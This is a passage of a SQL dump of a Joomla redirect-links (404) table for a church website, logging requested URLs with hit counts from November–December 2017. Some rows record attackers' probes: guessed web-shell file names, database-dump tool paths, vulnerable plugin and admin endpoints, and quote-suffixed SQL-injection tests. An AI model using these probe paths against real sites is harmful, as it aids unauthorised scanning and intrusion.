(7215, 'https://lifeoasisinternationalchurch.org/protocol.php', NULL, '', '', 18, 0, '2017-11-14 10:49:00', '0000-00-00 00:00:00', 301),
(7216, 'https://lifeoasisinternationalchurch.org/amazon-store', NULL, '', '', 7, 0, '2017-11-14 11:24:24', '0000-00-00 00:00:00', 301),
(7217, 'https://lifeoasisinternationalchurch.org/index.php/component/content/article/18-loic/50-young-achievers', NULL, '', '', 20, 0, '2017-11-14 14:36:38', '0000-00-00 00:00:00', 301),
(7218, 'https://lifeoasisinternationalchurch.org/index.php/forum/welcome-mat/destinyinternationalcollege/index.php', NULL, 'https://lifeoasisinternationalchurch.org/index.php/forum/welcome-mat/destinyinternationalcollege/index.php', '', 4, 0, '2017-11-14 14:57:23', '0000-00-00 00:00:00', 301),
(7219, 'https://lifeoasisinternationalchurch.org/7-kindom-builder/11-prayer-a-fasting-day-2', NULL, '', '', 4, 0, '2017-11-14 15:44:50', '0000-00-00 00:00:00', 301),
(7220, 'https://www.lifeoasisinternationalchurch.org/xxx.php', NULL, '', '', 1, 0, '2017-11-15 11:47:31', '0000-00-00 00:00:00', 301),
(7221, 'https://lifeoasisinternationalchurch.org/slambidy.htm', NULL, '', '', 1, 0, '2017-11-15 14:43:38', '0000-00-00 00:00:00', 301),
(7222, 'https://www.lifeoasisinternationalchurch.org/rwdkptnh.htm', NULL, '', '', 1, 0, '2017-11-15 14:43:46', '0000-00-00 00:00:00', 301),
(7223, 'https://www.lifeoasisinternationalchurch.org/lifestream', NULL, '', '', 2, 0, '2017-11-15 16:37:35', '0000-00-00 00:00:00', 301),
(7224, 'https://lifeoasisinternationalchurch.org/resources/liv e-streaming', NULL, '', '', 7, 0, '2017-11-15 17:48:36', '0000-00-00 00:00:00', 301),
(7225, 'https://www.lifeoasisinternationalchurch.org/wp-content/plugins/revslider/temp/', NULL, 'http://www.lifeoasisinternationalchurch.org/wp-content/plugins/revslider/temp/', '', 1, 0, '2017-11-15 23:18:03', '0000-00-00 00:00:00', 301),
(7226, 'https://lifeoasisinternationalchurch.org/index.php?option=com_k2&amp;view=itemlist&amp;itemid=622&amp;month=12&amp;year=2017&amp;task=calendar', NULL, '', '', 1, 0, '2017-11-16 03:36:25', '0000-00-00 00:00:00', 301),
(7227, 'https://lifeoasisinternationalchurch.org/.well-known/host-meta', NULL, '', '', 1, 0, '2017-11-16 05:34:44', '0000-00-00 00:00:00', 301),
(7228, 'https://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermons/0/0?start=20', NULL, '', '', 1, 0, '2017-11-16 15:04:46', '0000-00-00 00:00:00', 301),
(7229, 'https://www.lifeoasisinternationalchurch.org/gobcwel.html', NULL, '', '', 18, 0, '2017-11-16 21:27:23', '0000-00-00 00:00:00', 301),
(7230, 'https://lifeoasisinternationalchurch.org/index.php/programme/12-sample-content/19-sample-content-8', NULL, '', '', 5, 0, '2017-11-16 21:28:43', '0000-00-00 00:00:00', 301),
(7231, 'https://lifeoasisinternationalchurch.org/identity', NULL, '', '', 35, 0, '2017-11-17 07:49:29', '0000-00-00 00:00:00', 301),
(7232, 'https://lifeoasisinternationalchurch.org/create-an-account.html', NULL, '', '', 6, 0, '2017-11-17 10:06:38', '0000-00-00 00:00:00', 301),
(7233, 'https://lifeoasisinternationalchurch.org/mp3-messages/sermon/19-army-of-the-lord-2', NULL, '', '', 3, 0, '2017-11-17 14:21:42', '0000-00-00 00:00:00', 301),
(7234, 'https://142.4.21.132//index.php', NULL, '', '', 1, 0, '2017-11-17 17:29:15', '0000-00-00 00:00:00', 301),
(7235, 'https://lifeoasisinternationalchurch.org/mp3-messages/speaker/2-rev-olusola-ayodele-areogun/sermons', NULL, '', '', 4, 0, '2017-11-17 19:15:01', '0000-00-00 00:00:00', 301),
(7236, 'https://www.lifeoasisinternationalchurch.org/mag', NULL, '', '', 17, 0, '2017-11-17 19:55:37', '0000-00-00 00:00:00', 301),
(7237, 'https://lifeoasisinternationalchurch.org/destinyinternatio', NULL, '', '', 33, 0, '2017-11-18 03:00:02', '0000-00-00 00:00:00', 301),
(7238, 'https://lifeoasisinternationalchurch.org/p/', NULL, '', '', 1, 0, '2017-11-18 07:07:37', '0000-00-00 00:00:00', 301),
(7239, 'https://lifeoasisinternationalchurch.org/streamingprivate', NULL, '', '', 4, 0, '2017-11-18 07:11:01', '0000-00-00 00:00:00', 301),
(7240, 'https://www.lifeoasisinternationalchurch.org/resources/stewards', NULL, '', '', 2, 0, '2017-11-18 07:13:20', '0000-00-00 00:00:00', 301),
(7241, 'https://www.lifeoasisinternationalchurch.org/streaming/steward', NULL, '', '', 1, 0, '2017-11-18 07:18:38', '0000-00-00 00:00:00', 301),
(7242, 'https://lifeoasisinternationalchurch.org/loic-forum', NULL, '', '', 5, 0, '2017-11-18 19:36:06', '0000-00-00 00:00:00', 301),
(7243, 'https://www.lifeoasisinternationalchurch.org/prayer/7-kindom-builder/17-prayer-a-fasting-day-8', NULL, '', '', 7, 0, '2017-11-19 06:24:05', '0000-00-00 00:00:00', 301),
(7244, 'https://lifeoasisinternationalchurch.org/admistrator', NULL, '', '', 1, 0, '2017-11-19 06:46:20', '0000-00-00 00:00:00', 301),
(7245, 'https://lifeoasisinternationalchurch.org/admistrator/', NULL, '', '', 1, 0, '2017-11-19 06:47:50', '0000-00-00 00:00:00', 301),
(7246, 'https://lifeoasisinternationalchurch.org/uncategorized/assessment-of-custom-writing-service-just-for-collegers/', NULL, '', '', 1, 0, '2017-11-19 15:36:27', '0000-00-00 00:00:00', 301),
(7247, 'https://www.lifeoasisinternationalchurch.org/studycentre', NULL, '', '', 4, 0, '2017-11-19 16:38:39', '0000-00-00 00:00:00', 301),
(7248, 'https://lifeoasisinternationalchurch.org/12-sample-content/19-sample-content-8', NULL, '', '', 4, 0, '2017-11-19 22:13:40', '0000-00-00 00:00:00', 301),
(7249, 'https://www.lifeoasisinternationalchurch.org/component/k2/itemlist/tag/holy spirit\'', NULL, '', '', 1, 0, '2017-11-19 22:59:52', '0000-00-00 00:00:00', 301),
(7250, 'https://lifeoasisinternationalchurch.org/login-register.html?view=registration', NULL, '', '', 6, 0, '2017-11-20 08:24:56', '0000-00-00 00:00:00', 301),
(7251, 'https://www.lifeoasisinternationalchurch.org/component/k2/itemlist/tag/spirit\'', NULL, '', '', 1, 0, '2017-11-20 11:02:45', '0000-00-00 00:00:00', 301),
(7252, 'https://lifeoasisinternationalchurch.org/community/registro', NULL, '', '', 6, 0, '2017-11-20 11:28:47', '0000-00-00 00:00:00', 301),
(7253, 'https://lifeoasisinternationalchurch.org/home/register', NULL, '', '', 7, 0, '2017-11-20 14:50:14', '0000-00-00 00:00:00', 301),
(7254, 'https://lifeoasisinternationalchurch.org/loic/onlinebible.php', NULL, '', '', 19, 0, '2017-11-20 23:40:53', '0000-00-00 00:00:00', 301),
(7255, 'https://www.lifeoasisinternationalchurch.org/partnership/22-joomla/8-you-only-live-once-live-well', NULL, '', '', 2, 0, '2017-11-21 01:02:01', '0000-00-00 00:00:00', 301),
(7256, 'https://www.lifeoasisinternationalchurch.org/prayer/64-day-12', NULL, '', '', 5, 0, '2017-11-21 06:21:17', '0000-00-00 00:00:00', 301),
(7257, 'https://lifeoasisinternationalchurch.org/prayer/7-kindom-builder/10-prayer-a-fasting-day-1', NULL, '', '', 2, 0, '2017-11-21 07:50:07', '0000-00-00 00:00:00', 301),
(7258, 'https://www.lifeoasisinternationalchurch.org/ahr0chm6ly93d3cubglmzw9hc2lzaw50zxjuyxrpb25hbgnodxjjac5vcmcvzmfjzwjvb2s=/', NULL, 'https://www.lifeoasisinternationalchurch.org/facebook', '', 2, 0, '2017-11-21 13:19:40', '0000-00-00 00:00:00', 301),
(7259, 'https://lifeoasisinternationalchurch.org/wp-admin/admin-ajax.php?action=frm_forms_preview', NULL, 'http://lifeoasisinternationalchurch.org/wp-admin/admin-ajax.php?action=frm_forms_preview', '', 1, 0, '2017-11-21 16:41:13', '0000-00-00 00:00:00', 301),
(7260, 'https://lifeoasisinternationalchurch.org/resources/podcast', NULL, '', '', 4, 0, '2017-11-22 00:23:53', '0000-00-00 00:00:00', 301),
(7261, 'https://www.lifeoasisinternationalchurch.org/7-kindom-builder/50-prayer-a-fasting-day-40', NULL, '', '', 8, 0, '2017-11-22 01:54:02', '0000-00-00 00:00:00', 301),
(7262, 'https://lifeoasisinternationalchurch.org/index.php/222-2016-day-5', NULL, '', '', 15, 0, '2017-11-22 09:33:30', '0000-00-00 00:00:00', 301),
(7263, 'https://www.lifeoasisinternationalchurch.org/index.php/finance-convention-online-registration', NULL, '', '', 5, 0, '2017-11-22 11:01:18', '0000-00-00 00:00:00', 301),
(7264, 'https://www.lifeoasisinternationalchurch.org/prayer/7-kindom-builder/50-prayer-a-fasting-day-40', NULL, '', '', 2, 0, '2017-11-22 14:01:00', '0000-00-00 00:00:00', 301),
(7265, 'https://www.lifeoasisinternationalchurch.org/resources/blog/item/null', NULL, '', '', 3, 0, '2017-11-22 17:05:08', '0000-00-00 00:00:00', 301),
(7266, 'https://www.lifeoasisinternationalchurch.org/template-info/music-2', NULL, '', '', 6, 0, '2017-11-22 19:59:09', '0000-00-00 00:00:00', 301),
(7267, 'https://www.lifeoasisinternationalchurch.org/&wd=test', NULL, '', '', 33, 0, '2017-11-23 08:34:04', '0000-00-00 00:00:00', 301),
(7268, 'https://lifeoasisinternationalchurch.org/6c3feced5fe97be15edcefad3cdc76e7.php', NULL, 'lifeoasisinternationalchurch.org', '', 4, 0, '2017-11-23 15:57:59', '0000-00-00 00:00:00', 301),
(7269, 'https://lifeoasisinternationalchurch.org/abc.php', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2017-11-23 15:58:07', '0000-00-00 00:00:00', 301),
(7270, 'https://lifeoasisinternationalchurch.org/loic/partnership.php', NULL, '', '', 7, 0, '2017-11-23 20:50:52', '0000-00-00 00:00:00', 301),
(7271, 'https://lifeoasisinternationalchurch.org/administration.html', NULL, '', '', 3, 0, '2017-11-24 04:53:18', '0000-00-00 00:00:00', 301),
(7272, 'https://www.lifeoasisinternationalchurch.org/11-demo-articles/10-preset-styles', NULL, '', '', 12, 0, '2017-11-24 09:42:44', '0000-00-00 00:00:00', 301),
(7273, 'https://lifeoasisinternationalchurch.org/partnership/18-loic/50-young-achievers', NULL, '', '', 9, 0, '2017-11-24 20:33:56', '0000-00-00 00:00:00', 301),
(7274, 'https://www.lifeoasisinternationalchurch.org/daughtersofdestiny', NULL, '', '', 2, 0, '2017-11-25 03:33:56', '0000-00-00 00:00:00', 301),
(7275, 'https://lifeoasisinternationalchurch.org/wp-load.php', NULL, '', '', 3, 0, '2017-11-25 05:55:17', '0000-00-00 00:00:00', 301);
INSERT INTO `y57u5_redirect_links` (`id`, `old_url`, `new_url`, `referer`, `comment`, `hits`, `published`, `created_date`, `modified_date`, `header`) VALUES
(7276, 'https://www.lifeoasisinternationalchurch.org/about-us/', NULL, '', '', 11, 0, '2017-11-25 08:09:55', '0000-00-00 00:00:00', 301),
(7277, 'https://lifeoasisinternationalchurch.org/about-us/', NULL, '', '', 11, 0, '2017-11-25 08:09:56', '0000-00-00 00:00:00', 301),
(7278, 'https://www.lifeoasisinternationalchurch.org/programmes.html', NULL, '', '', 10, 0, '2017-11-25 19:19:08', '0000-00-00 00:00:00', 301),
(7279, 'https://www.lifeoasisinternationalchurch.org/component/users/?view=reset/rk=2/rs=t.evwhd93olhvedgoescfepqczw-', NULL, 'https://www.lifeoasisinternationalchurch.org/', '', 2, 0, '2017-11-25 21:22:26', '0000-00-00 00:00:00', 301),
(7280, 'https://lifeoasisinternationalchurch.org/index.php?option=com_easybookreloaded', NULL, '', '', 1, 0, '2017-11-26 01:59:28', '0000-00-00 00:00:00', 301),
(7281, 'https://lifeoasisinternationalchurch.org/index.php/gaestebuch/', NULL, '', '', 13, 0, '2017-11-26 01:59:30', '0000-00-00 00:00:00', 301),
(7282, 'https://lifeoasisinternationalchurch.org/gaestebuch', NULL, '', '', 13, 0, '2017-11-26 01:59:32', '0000-00-00 00:00:00', 301),
(7283, 'https://lifeoasisinternationalchurch.org/index.php?option=com_easygb', NULL, '', '', 1, 0, '2017-11-26 01:59:34', '0000-00-00 00:00:00', 301),
(7284, 'https://lifeoasisinternationalchurch.org/index.php?option=com_akobook', NULL, '', '', 1, 0, '2017-11-26 01:59:35', '0000-00-00 00:00:00', 301),
(7285, 'https://lifeoasisinternationalchurch.org/index.php?option=com_vitabook', NULL, '', '', 1, 0, '2017-11-26 01:59:37', '0000-00-00 00:00:00', 301),
(7286, 'https://lifeoasisinternationalchurch.org/index.php?option=com_jambook', NULL, '', '', 1, 0, '2017-11-26 01:59:39', '0000-00-00 00:00:00', 301),
(7287, 'https://lifeoasisinternationalchurch.org/component/jambook/', NULL, '', '', 13, 0, '2017-11-26 01:59:41', '0000-00-00 00:00:00', 301),
(7288, 'https://lifeoasisinternationalchurch.org/index.php/component/jambook/', NULL, '', '', 13, 0, '2017-11-26 01:59:42', '0000-00-00 00:00:00', 301),
(7289, 'https://lifeoasisinternationalchurch.org/guestbook/', NULL, '', '', 13, 0, '2017-11-26 01:59:44', '0000-00-00 00:00:00', 301),
(7290, 'https://lifeoasisinternationalchurch.org/index.php/guestbook/', NULL, '', '', 26, 0, '2017-11-26 01:59:46', '0000-00-00 00:00:00', 301),
(7291, 'https://lifeoasisinternationalchurch.org/index.php/gaestebuch', NULL, '', '', 13, 0, '2017-11-26 01:59:48', '0000-00-00 00:00:00', 301),
(7292, 'https://lifeoasisinternationalchurch.org/index.php?option=com_phocaguestbook&id=1', NULL, '', '', 1, 0, '2017-11-26 01:59:51', '0000-00-00 00:00:00', 301),
(7293, 'https://lifeoasisinternationalchurch.org/index.php?option=com_phocaguestbook', NULL, '', '', 1, 0, '2017-11-26 01:59:53', '0000-00-00 00:00:00', 301),
(7294, 'https://www.lifeoasisinternationalchurch.org/index.php/template-info-2/the-church', NULL, '', '', 6, 0, '2017-11-26 02:09:11', '0000-00-00 00:00:00', 301),
(7295, 'https://lifeoasisinternationalchurch.org/2-features/128-2017', NULL, '', '', 2, 0, '2017-11-26 10:13:14', '0000-00-00 00:00:00', 301),
(7296, 'https://lifeoasisinternationalchurch.org/resources/abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz0123456789+/', NULL, 'http://connect.facebook.net/en_GB/all.js', '', 1, 0, '2017-11-26 14:50:47', '0000-00-00 00:00:00', 301),
(7297, 'https://lifeoasisinternationalchurch.org/resources/^([^:/', NULL, 'http://connect.facebook.net/en_GB/all.js', '', 1, 0, '2017-11-26 14:50:47', '0000-00-00 00:00:00', 301),
(7298, 'https://lifeoasisinternationalchurch.org/restserver.php', NULL, 'http://connect.facebook.net/en_GB/all.js', '', 1, 0, '2017-11-26 14:50:47', '0000-00-00 00:00:00', 301),
(7299, 'https://lifeoasisinternationalchurch.org/resources/dialog/', NULL, 'http://connect.facebook.net/en_GB/all.js', '', 1, 0, '2017-11-26 14:50:48', '0000-00-00 00:00:00', 301),
(7300, 'https://lifeoasisinternationalchurch.org/resources/blog/item/abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz0123456789+/', NULL, 'http://connect.facebook.net/en_US/all.js', '', 1, 0, '2017-11-26 15:03:38', '0000-00-00 00:00:00', 301),
(7301, 'https://lifeoasisinternationalchurch.org/resources/blog/item/^([^:/', NULL, 'http://connect.facebook.net/en_US/all.js', '', 1, 0, '2017-11-26 15:03:39', '0000-00-00 00:00:00', 301),
(7302, 'https://lifeoasisinternationalchurch.org/resources/blog/item/dialog/', NULL, 'http://connect.facebook.net/en_US/all.js', '', 1, 0, '2017-11-26 15:03:46', '0000-00-00 00:00:00', 301),
(7303, 'https://lifeoasisinternationalchurch.org/prayer/7-kindom-builder/15-prayer-a-fasting-day-6', NULL, '', '', 2, 0, '2017-11-27 00:45:37', '0000-00-00 00:00:00', 301),
(7304, 'https://www.lifeoasisinternationalchurch.org/20-prayer-a-fasting-day-11', NULL, '', '', 8, 0, '2017-11-27 04:01:38', '0000-00-00 00:00:00', 301),
(7305, 'https://www.lifeoasisinternationalchurch.org/prayer/7-kindom-builder/18-prayer-a-fasting-day', NULL, '', '', 2, 0, '2017-11-27 14:56:24', '0000-00-00 00:00:00', 301),
(7306, 'https://www.lifeoasisinternationalchurch.org/index.php/gallery', NULL, '', '', 10, 0, '2017-11-27 15:25:54', '0000-00-00 00:00:00', 301),
(7307, 'https://www.lifeoasisinternationalchurch.org/streamingj', NULL, '', '', 3, 0, '2017-11-28 22:00:55', '0000-00-00 00:00:00', 301),
(7308, 'https://lifeoasisinternationalchurch.org/upxx.php', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2017-11-29 07:56:43', '0000-00-00 00:00:00', 301),
(7309, 'https://lifeoasisinternationalchurch.org/modules/mod_simpleemailform/index.html', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2017-11-29 09:49:07', '0000-00-00 00:00:00', 301),
(7310, 'https://lifeoasisinternationalchurch.org/prayer/7-kindom-builder/36-prayer-a-fasting-day-27', NULL, '', '', 2, 0, '2017-11-29 12:40:19', '0000-00-00 00:00:00', 301),
(7311, 'https://lifeoasisinternationalchurch.org/index.php/forum/welcome-mat/destinyinternationalcollege/index.php/forum/welcome-mat/destinyinternationalcollege/index.php', NULL, 'https://lifeoasisinternationalchurch.org/destinyinternationalcollege/index.php', '', 1, 0, '2017-11-29 15:28:24', '0000-00-00 00:00:00', 301),
(7312, 'https://lifeoasisinternationalchurch.org/forum/welcome-mat/destinyinternationalcollege/index.php/forum/welcome-mat/destinyinternationalcollege/index.php', NULL, 'https://lifeoasisinternationalchurch.org/forum/welcome-mat/destinyinternationalcollege/index.php/forum/welcome-mat/destinyinternationalcollege/index.php', '', 1, 0, '2017-11-29 15:28:25', '0000-00-00 00:00:00', 301),
(7313, 'https://lifeoasisinternationalchurch.org/language/includes.php', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2017-11-29 16:36:20', '0000-00-00 00:00:00', 301),
(7314, 'https://www.lifeoasisinternationalchurch.org/index.php/11-demo-articles/20-welcome', NULL, 'http://m.facebook.com', '', 4, 0, '2017-11-29 22:14:45', '0000-00-00 00:00:00', 301),
(7315, 'https://www.lifeoasisinternationalchurch.org/prayer.php', NULL, '', '', 5, 0, '2017-11-30 01:56:17', '0000-00-00 00:00:00', 301),
(7316, 'https://www.lifeoasisinternationalchurch.org/prayer/62-day-10', NULL, '', '', 1, 0, '2017-11-30 03:40:37', '0000-00-00 00:00:00', 301),
(7317, 'https://www.lifeoasisinternationalchurch.org/bibleschool.html', NULL, '', '', 6, 0, '2017-11-30 04:40:40', '0000-00-00 00:00:00', 301),
(7318, 'https://www.lifeoasisinternationalchurch.org/streaming/18-loic/50-young-achievers', NULL, '', '', 4, 0, '2017-11-30 08:17:33', '0000-00-00 00:00:00', 301),
(7319, 'https://lifeoasisinternationalchurch.org/index.php/12-sample-content/', NULL, '', '', 2, 0, '2017-11-30 11:02:33', '0000-00-00 00:00:00', 301),
(7320, 'https://lifeoasisinternationalchurch.org/node/218/track', NULL, '', '', 1, 0, '2017-11-30 18:18:35', '0000-00-00 00:00:00', 301),
(7321, 'https://lifeoasisinternationalchurch.org/msd/sql.php', NULL, '', '', 18, 0, '2017-11-30 18:31:59', '0000-00-00 00:00:00', 301),
(7322, 'https://lifeoasisinternationalchurch.org/mysqldumper/sql.php', NULL, '', '', 14, 0, '2017-11-30 18:32:01', '0000-00-00 00:00:00', 301),
(7323, 'https://lifeoasisinternationalchurch.org/sql/sql.php', NULL, '', '', 7, 0, '2017-11-30 18:32:03', '0000-00-00 00:00:00', 301),
(7324, 'https://lifeoasisinternationalchurch.org/database/sql.php', NULL, '', '', 7, 0, '2017-11-30 18:32:07', '0000-00-00 00:00:00', 301),
(7325, 'https://www.lifeoasisinternationalchurch.org/resources/french', NULL, '', '', 8, 0, '2017-11-30 19:37:18', '0000-00-00 00:00:00', 301),
(7326, 'https://lifeoasisinternationalchurch.org/index.php', NULL, 'lifeoasisinternationalchurch.org', '', 14670, 0, '2017-11-30 21:34:45', '0000-00-00 00:00:00', 301),
(7327, 'https://www.lifeoasisinternationalchurch.org/index.php/live-services', NULL, '', '', 7, 0, '2017-12-01 02:48:08', '0000-00-00 00:00:00', 301),
(7328, 'https://lifeoasisinternationalchurch.org/resour0ces/live-streaming', NULL, '', '', 1, 0, '2017-12-01 09:43:09', '0000-00-00 00:00:00', 301),
(7329, 'https://lifeoasisinternationalchurch.org/resour0ces/liv', NULL, '', '', 1, 0, '2017-12-01 09:43:12', '0000-00-00 00:00:00', 301),
(7330, 'https://www.lifeoasisinternationalchurch.org/prayer/7-kindom-builder/14-prayer-a-fasting-day-5', NULL, '', '', 2, 0, '2017-12-01 12:23:00', '0000-00-00 00:00:00', 301),
(7331, 'https://lifeoasisinternationalchurch.org/contact.html', NULL, '', '', 7, 0, '2017-12-01 14:29:21', '0000-00-00 00:00:00', 301),
(7332, 'https://www.lifeoasisinternationalchurch.org/priva', NULL, '', '', 5, 0, '2017-12-01 16:19:11', '0000-00-00 00:00:00', 301),
(7333, 'https://lifeoasisinternationalchurch.org/resources/privatestreaming', NULL, '', '', 2, 0, '2017-12-01 16:19:22', '0000-00-00 00:00:00', 301),
(7334, 'https://lifeoasisinternationalchurch.org/streaminglife', NULL, '', '', 3, 0, '2017-12-01 16:32:21', '0000-00-00 00:00:00', 301),
(7335, 'https://lifeoasisinternationalchurch.org/resources/private-streaming', NULL, '', '', 26, 0, '2017-12-01 16:33:16', '0000-00-00 00:00:00', 301),
(7336, 'https://lifeoasisinternationalchurch.org/private live-streaming', NULL, '', '', 1, 0, '2017-12-01 16:40:01', '0000-00-00 00:00:00', 301),
(7337, 'https://lifeoasisinternationalchurch.org/resources/live-st', NULL, '', '', 1, 0, '2017-12-01 16:49:39', '0000-00-00 00:00:00', 301),
(7338, 'https://lifeoasisinternationalchurch.org/-st', NULL, '', '', 1, 0, '2017-12-01 16:49:47', '0000-00-00 00:00:00', 301),
(7339, 'https://www.lifeoasisinternationalchurch.org/pri', NULL, '', '', 6, 0, '2017-12-01 16:50:41', '0000-00-00 00:00:00', 301),
(7340, 'https://lifeoasisinternationalchurch.org/streaming/stewards', NULL, '', '', 2, 0, '2017-12-01 17:11:02', '0000-00-00 00:00:00', 301),
(7341, 'https://lifeoasisinternationalchurch.org/streaming/steward', NULL, '', '', 1, 0, '2017-12-01 17:11:10', '0000-00-00 00:00:00', 301),
(7342, 'https://lifeoasisinternationalchurch.org/streaming/private streaming', NULL, '', '', 1, 0, '2017-12-01 17:12:10', '0000-00-00 00:00:00', 301),
(7343, 'https://lifeoasisinternationalchurch.org/private/streaming', NULL, '', '', 5, 0, '2017-12-01 17:17:05', '0000-00-00 00:00:00', 301),
(7344, 'https://lifeoasisinternationalchurch.org/resources/alternatestreaming', NULL, '', '', 3, 0, '2017-12-01 18:47:33', '0000-00-00 00:00:00', 301),
(7345, 'https://lifeoasisinternationalchurch.org/youtubealternatestreaming', NULL, '', '', 1, 0, '2017-12-01 18:48:13', '0000-00-00 00:00:00', 301),
(7346, 'https://lifeoasisinternationalchurch.org/private', NULL, 'https://lifeoasisinternationalchurch.org/private', '', 3, 0, '2017-12-01 19:10:41', '0000-00-00 00:00:00', 301),
(7347, 'https://lifeoasisinternationalchurch.org/msd1.24.2/sql.php', NULL, '', '', 6, 0, '2017-12-01 19:37:07', '0000-00-00 00:00:00', 301),
(7348, 'https://lifeoasisinternationalchurch.org/msd1.24.3/sql.php', NULL, '', '', 6, 0, '2017-12-01 19:37:09', '0000-00-00 00:00:00', 301),
(7349, 'https://lifeoasisinternationalchurch.org/msd1.24.4/sql.php', NULL, '', '', 6, 0, '2017-12-01 19:37:11', '0000-00-00 00:00:00', 301),
(7350, 'https://lifeoasisinternationalchurch.org/msd1.24stable/sql.php', NULL, '', '', 6, 0, '2017-12-01 19:37:13', '0000-00-00 00:00:00', 301),
(7351, 'https://lifeoasisinternationalchurch.org/lieats.php', NULL, '', '', 5, 0, '2017-12-01 21:36:29', '0000-00-00 00:00:00', 301),
(7352, 'https://www.lifeoasisinternationalchurch.org/sting', NULL, '', '', 1, 0, '2017-12-01 21:46:23', '0000-00-00 00:00:00', 301),
(7353, 'https://www.lifeoasisinternationalchurch.org/youtube/private', NULL, '', '', 5, 0, '2017-12-02 03:41:27', '0000-00-00 00:00:00', 301),
(7354, 'https://www.lifeoasisinternationalchurch.org/index.html', NULL, '', '', 2, 0, '2017-12-02 05:54:29', '0000-00-00 00:00:00', 301),
(7355, 'https://www.lifeoasisinternationalchurch.org/live-streaming/private', NULL, '', '', 5, 0, '2017-12-02 06:23:43', '0000-00-00 00:00:00', 301),
(7356, 'https://www.lifeoasisinternationalchurch.org/private-sstreaming', NULL, '', '', 2, 0, '2017-12-02 06:31:21', '0000-00-00 00:00:00', 301),
(7357, 'https://www.lifeoasisinternationalchurch.org/life-streaming', NULL, '', '', 1, 0, '2017-12-02 06:47:50', '0000-00-00 00:00:00', 301),
(7358, 'https://www.lifeoasisinternationalchurch.org/streaming /private', NULL, '', '', 1, 0, '2017-12-02 06:51:29', '0000-00-00 00:00:00', 301),
(7359, 'https://lifeoasisinternationalchurch.org/resources/alternate', NULL, '', '', 1, 0, '2017-12-02 07:21:23', '0000-00-00 00:00:00', 301),
(7360, 'https://lifeoasisinternationalchurch.org/node/58147/track', NULL, '', '', 1, 0, '2017-12-02 08:39:00', '0000-00-00 00:00:00', 301),
(7361, 'https://www.lifeoasisinternationalchurch.org/pr', NULL, '', '', 6, 0, '2017-12-02 12:13:07', '0000-00-00 00:00:00', 301),
(7362, 'https://www.lifeoasisinternationalchurch.org/ssprivate', NULL, '', '', 2, 0, '2017-12-02 13:59:47', '0000-00-00 00:00:00', 301),
(7363, 'https://www.lifeoasisinternationalchurch.org/register/', NULL, '', '', 5, 0, '2017-12-02 16:16:27', '0000-00-00 00:00:00', 301),
(7364, 'https://www.lifeoasisinternationalchurch.org/login.php', NULL, '', '', 5, 0, '2017-12-02 16:16:30', '0000-00-00 00:00:00', 301),
(7365, 'https://www.lifeoasisinternationalchurch.org/signup.php', NULL, '', '', 2, 0, '2017-12-02 16:16:55', '0000-00-00 00:00:00', 301),
(7366, 'https://www.lifeoasisinternationalchurch.org/streamingprivate', NULL, '', '', 1, 0, '2017-12-02 16:35:04', '0000-00-00 00:00:00', 301),
(7367, 'https://www.lifeoasisinternationalchurch.org/resources/seminar', NULL, '', '', 16, 0, '2017-12-02 18:28:23', '0000-00-00 00:00:00', 301),
(7368, 'https://www.lifeoasisinternationalchurch.org/mp3-messages/speaker/2?start=20', NULL, '', '', 7, 0, '2017-12-02 22:19:37', '0000-00-00 00:00:00', 301),
(7369, 'https://www.lifeoasisinternationalchurch.org/prayer/7-kindom-builder/11-prayer-a-fasting-day-2', NULL, '', '', 10, 0, '2017-12-02 23:20:44', '0000-00-00 00:00:00', 301),
(7370, 'https://lifeoasisinternationalchurch.org/resources/live-strea', NULL, '', '', 3, 0, '2017-12-03 06:31:35', '0000-00-00 00:00:00', 301),
(7371, 'https://www.lifeoasisinternationalchurch.org/home/ministry', NULL, '', '', 4, 0, '2017-12-03 08:22:23', '0000-00-00 00:00:00', 301),
(7372, 'https://www.lifeoasisinternationalchurch.org/component/content/article/18-loic/34-music', NULL, '', '', 2, 0, '2017-12-03 10:09:22', '0000-00-00 00:00:00', 301),
(7373, 'https://lifeoasisinternationalchurch.org/mp3-messages/sermon/22-dealing-with-buts-in-your-life-2', NULL, '', '', 6, 0, '2017-12-03 13:23:43', '0000-00-00 00:00:00', 301),
(7374, 'https://lifeoasisinternationalchurch.org/node/14/track', NULL, '', '', 1, 0, '2017-12-03 21:16:11', '0000-00-00 00:00:00', 301),
(7375, 'https://lifeoasisinternationalchurch.org/postnew/popup-pomo.php', NULL, 'http://site.ru', '', 3, 0, '2017-12-04 02:36:16', '0000-00-00 00:00:00', 301),
(7376, 'https://www.lifeoasisinternationalchurch.org/faith.php', NULL, '', '', 5, 0, '2017-12-04 04:54:35', '0000-00-00 00:00:00', 301),
(7377, 'https://mail.lifeoasisinternationalchurch.org/gobc2017', NULL, '', '', 8, 0, '2017-12-04 08:32:12', '0000-00-00 00:00:00', 301),
(7378, 'https://mail.lifeoasisinternationalchurch.org/partnership/form', NULL, '', '', 8, 0, '2017-12-04 08:32:22', '0000-00-00 00:00:00', 301),
(7379, 'https://lifeoasisinternationalchurch.org/register.php', NULL, '', '', 41, 0, '2017-12-04 16:19:29', '0000-00-00 00:00:00', 301),
(7380, 'https://www.lifeoasisinternationalchurch.org/resources/daily-bible-reading', NULL, '', '', 8, 0, '2017-12-04 18:57:41', '0000-00-00 00:00:00', 301),
(7381, 'https://lifeoasisinternationalchurch.org/ludk.php', NULL, '', '', 3, 0, '2017-12-04 23:08:25', '0000-00-00 00:00:00', 301),
(7382, 'https://www.nike.comhttps//www.nike.com/cn/launch/t/air-force-1-travis-scott', NULL, 'https://www.nike.com/cn/launch/?s=upcoming', '', 1, 0, '2017-12-05 15:18:44', '0000-00-00 00:00:00', 301),
(7383, 'https://lifeoasisinternationalchurch.org/mp3-messages/sermon/12-manifesting-spiritual-gifts', NULL, '', '', 4, 0, '2017-12-05 18:04:53', '0000-00-00 00:00:00', 301),
(7384, 'https://lifeoasisinternationalchurch.org/prayer/7-kindom-builder/20-prayer-a-fasting-day-11', NULL, '', '', 4, 0, '2017-12-05 19:18:56', '0000-00-00 00:00:00', 301),
(7385, 'https://www.lifeoasisinternationalchurch.org/script>', NULL, '', '', 5, 0, '2017-12-06 02:23:41', '0000-00-00 00:00:00', 301),
